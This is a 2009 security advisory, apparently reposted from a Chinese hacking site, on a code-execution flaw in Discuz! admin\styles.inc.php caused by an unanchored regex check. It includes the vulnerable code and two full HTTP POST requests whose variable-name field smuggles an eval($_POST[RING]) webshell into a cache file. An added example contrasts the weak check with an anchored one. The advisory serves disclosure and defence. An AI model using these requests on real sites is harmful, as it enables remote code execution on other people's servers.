Source: www.myhack58.com (MYHACK58: 62200923926, posted anonymously)
Jul 17, 2009 - 12:00 a.m.

Discuz! admin\styles.inc.php get-webshell vulnerability warning


Author: ring04h
Team: http://www.80vul.com

Because the preg_match check applied to the $newcvar variable in Discuz! admin\styles.inc.php is not strict enough, a code execution vulnerability results.

I. Analysis

The code in file admin\styles.inc.php:

if($newcvar && $newcsubst) {
    if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
        cpmsg('styles_edit_variable_duplicate', '', 'error');
    } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
        // The pattern has no ^ / $ anchors, so it only requires that $newcvar
        // contain an identifier-shaped substring somewhere; any other
        // characters before or after it are accepted.
        cpmsg('styles_edit_variable_illegal', '', 'error');
    }
    $newcvar = strtolower($newcvar);
    $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
        VALUES ('$id', '$newcvar', '$newcsubst')");
}

The code above shows that a user with admin permissions can edit a style and insert a custom template variable whose name is !','80VUL');EVAL($_POST[RING]);// with the substitution "exp by ring04h!"; the unanchored check accepts it, the variable is written into the style cache file, and remote code execution via a webshell follows.
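Added example (not from the advisory or the Discuz! code base): the unanchored check quoted above beside an anchored one, run against a normal variable name and the URL-decoded newcvar value from the advisory's request; the anchored pattern with \A and \z is an assumed hardening, not the vendor's patch, and the function names are this example's own.

```php
<?php
// Added example, not Discuz! code: the unanchored identifier check quoted
// from admin/styles.inc.php beside an anchored version (assumed hardening).

// As in the advisory: the pattern has no anchors, so preg_match succeeds
// for ANY string that contains an identifier-shaped substring somewhere.
function weak_name_ok(string $name): bool
{
    return (bool) preg_match('/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/', $name);
}

// Hardened check: the whole value must be exactly one identifier.
// \A and \z are used rather than ^ and $ because $ also matches before a
// trailing "\n", which would let "name\n" through.
function strict_name_ok(string $name): bool
{
    return (bool) preg_match('/\A[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\z/', $name);
}

// Constructed inputs: a normal style variable name, the URL-decoded newcvar
// value from the advisory's second request, and two edge cases.
$cases = [
    'headerbgcolor',
    "!','80vul');eval(\$_post[ring]);//",
    "headerbgcolor\n",
    '',
];

foreach ($cases as $name) {
    printf("%-42s weak: %-6s strict: %s\n",
        var_export($name, true),
        weak_name_ok($name) ? 'pass' : 'reject',
        strict_name_ok($name) ? 'pass' : 'reject');
}
```

Only the first input passes the anchored check; the advisory's value passes the weak check because it contains "vul".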

II. Exploitation

POC:

step1:

POST /bbs/admincp.php?action=styles HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

formhash=99238f2d&anchor=&updatecsscache=0&namenew%5B1%5D=%C4%AC%C8%CF%B7%E7%B8%F1&availablenew%5B1%5D=1&defaultnew=1&newname=exp&stylesubmit=%CC%E1%BD%BB

step2:

POST /bbs/admincp.php?action=styles&operation=edit&id=6 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1402
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB

webshell:

http://www.80vul.com/bbs/forumdata/cache/style_6.php

III. Patch

The vulnerability has been reported to the vendor; wait for the official patch.